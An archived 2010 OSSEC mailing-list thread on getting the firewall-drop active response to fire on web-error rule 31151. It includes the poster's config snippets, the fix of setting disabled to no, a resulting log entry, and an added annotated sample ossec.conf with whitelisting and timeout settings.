>>> ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>>> error codes from same source ip.'
>>> ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>>> error codes from same source ip.'
>>>
>>> As far as I can tell, the active response has  never been triggered.
>>> There's no active-response log in /var/ossec/logs and no logging of
>>> firewall changes.
>>>
>>> What am I missing?
>>

That was it. Thanks. I had another attack and the rule fired. Here's the
current ossec.conf:



  firewall-drop
  firewall-drop.sh
  srcip
  yes



  no
  firewall-drop
  local
  31151,31152,31153



And this was in the logs

# more active-responses.log
Sat Oct 30 17:01:56 CDT 2010
/var/ossec/active-response/bin/firewall-drop.sh add
 - 210.21.221.156 1288476115.25429 31151


-- 
-- Steve
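An ossec.conf fragment, added here and not a copy of anyone's file from these threads, that puts together the settings asked about above: the firewall-drop command and active-response stanza from this thread, the 600-second timeout and repeated_offenders settings from the unblock question, and the white_list entries Steve keeps recommending. The addresses are placeholders (assumption); the rule ids 31151, 31152 and 31153 are the ones from the thread:

```xml
<!-- ossec.conf fragment: added example, not the poster's configuration.
     The white_list addresses are placeholders; put your own admin hosts there. -->
<ossec_config>

  <global>
    <!-- Never block these sources, whatever rule fires. Add your own IP
         before enabling any blocking response: a mistyped rule otherwise
         locks you out for a full timeout period. -->
    <white_list>192.0.2.10</white_list>
    <white_list>198.51.100.0/24</white_list>
  </global>

  <command>
    <name>firewall-drop</name>
    <executable>firewall-drop.sh</executable>
    <!-- the script is handed the source IP extracted by the decoder -->
    <expect>srcip</expect>
    <!-- yes: OSSEC runs "firewall-drop.sh delete" when the timeout expires,
         which is the unblock seen in active-responses.log -->
    <timeout_allowed>yes</timeout_allowed>
  </command>

  <active-response>
    <!-- keep this explicit: "yes" here silently turns the stanza off -->
    <disabled>no</disabled>
    <command>firewall-drop</command>
    <location>local</location>
    <!-- fire on the "multiple web attacks from the same source ip" rules;
         with rules_id present no <level> element is needed -->
    <rules_id>31151,31152,31153</rules_id>
    <!-- seconds: 600 is the ten-minute block observed in the threads -->
    <timeout>600</timeout>
    <!-- minutes: an IP that gets blocked again is held longer each time,
         30 then 60 then 120, instead of the base timeout -->
    <repeated_offenders>30,60,120</repeated_offenders>
  </active-response>

</ossec_config>
```

Each add and delete is appended to /var/ossec/logs/active-responses.log with the IP and the rule id, which is the place to confirm the timeout and the escalation actually happen.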


Re: [ossec-list] Re: Active Response not activating

2010-10-27 Thread Steven Stern
It shows in the email alert I get from OSSEC.  The snippet below was
grabbed from OSSEC's logs.

On Wed, Oct 27, 2010 at 1:38 PM, Jeremy Lee  wrote:
> Does the source IP even show when that rule is tripped?
>
> On Wed, Oct 27, 2010 at 11:30 AM, Steven Stern
>  wrote:
>>
>> Thanks.  I've changed it and will await the next attack.
>>
>> On Wed, Oct 27, 2010 at 1:15 PM, jplee3  wrote:
>> > Your section looks OK. There may be issues with the <active-response> portion however. Try this:
>> >
>> > 
>> >  no
>> >  firewall-drop
>> >  local
>> >  31151
>> >  8 (I don't think you even need this flag if you
>> > *only* want to trigger on the rule id 31151)
>> > 
>> >
>> >
>> > Let us know if that works. I think it might be the "disabled" flag
>> > that was keeping it back.
>> >
>> >
>> > On Oct 27, 10:44 am, Steven Stern 
>> > wrote:
>> >> In /var/ossec/etc/osse.conf, I have
>> >>
>> >> 
>> >>   firewall-drop
>> >>   firewall-drop.sh
>> >>   srcip
>> >>   yes
>> >> 
>> >>
>> >> 
>> >>   firewall-drop
>> >>   local
>> >>   31151
>> >>   8
>> >> 
>> >>
>> >> My logs show multiple 31151 alerts. For example:
>> >> ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> >> error codes from same source ip.'
>> >> ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> >> error codes from same source ip.'
>> >>
>> >> As far as I can tell, the active response has  never been triggered.
>> >> There's no active-response log in /var/ossec/logs and no logging of
>> >> firewall changes.
>> >>
>> >> What am I missing?
>> >
>
>


Re: [ossec-list] Re: Active Response not activating

2010-10-27 Thread Steven Stern
Thanks.  I've changed it and will await the next attack.

On Wed, Oct 27, 2010 at 1:15 PM, jplee3  wrote:
> Your section looks OK. There may be issues with the <active-response> portion however. Try this:
>
> 
>  no
>  firewall-drop
>  local
>  31151
>  8 (I don't think you even need this flag if you
> *only* want to trigger on the rule id 31151)
> 
>
>
> Let us know if that works. I think it might be the "disabled" flag
> that was keeping it back.
>
>
> On Oct 27, 10:44 am, Steven Stern 
> wrote:
>> In /var/ossec/etc/osse.conf, I have
>>
>> 
>>   firewall-drop
>>   firewall-drop.sh
>>   srcip
>>   yes
>> 
>>
>> 
>>   firewall-drop
>>   local
>>   31151
>>   8
>> 
>>
>> My logs show multiple 31151 alerts. For example:
>> ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> error codes from same source ip.'
>> ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
>> error codes from same source ip.'
>>
>> As far as I can tell, the active response has  never been triggered.
>> There's no active-response log in /var/ossec/logs and no logging of
>> firewall changes.
>>
>> What am I missing?
>


[ossec-list] Active Response not activating

2010-10-27 Thread Steven Stern
In /var/ossec/etc/osse.conf, I have


  firewall-drop
  firewall-drop.sh
  srcip
  yes



  firewall-drop
  local
  31151
  8


My logs show multiple 31151 alerts. For example:
ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'
ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'

As far as I can tell, the active response has  never been triggered.
There's no active-response log in /var/ossec/logs and no logging of
firewall changes.

What am I missing?


[ossec-list] Active Response not activating

2010-10-27 Thread Steven Stern
OSSEC 2.5.1, Fedora 13

In /var/ossec/etc/osse.conf, I have


 firewall-drop
 firewall-drop.sh
 srcip
 yes



 firewall-drop
 local
 31151
 8


My logs show multiple 31151 alerts. For example:
ossec-alerts-23.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'
ossec-alerts-25.log:Rule: 31151 (level 10) -> 'Mutiple web server 400
error codes from same source ip.'

As far as I can tell, the active response has  never been triggered.
There's no active-response log in /var/ossec/logs and no logging of
firewall changes.

What am I missing?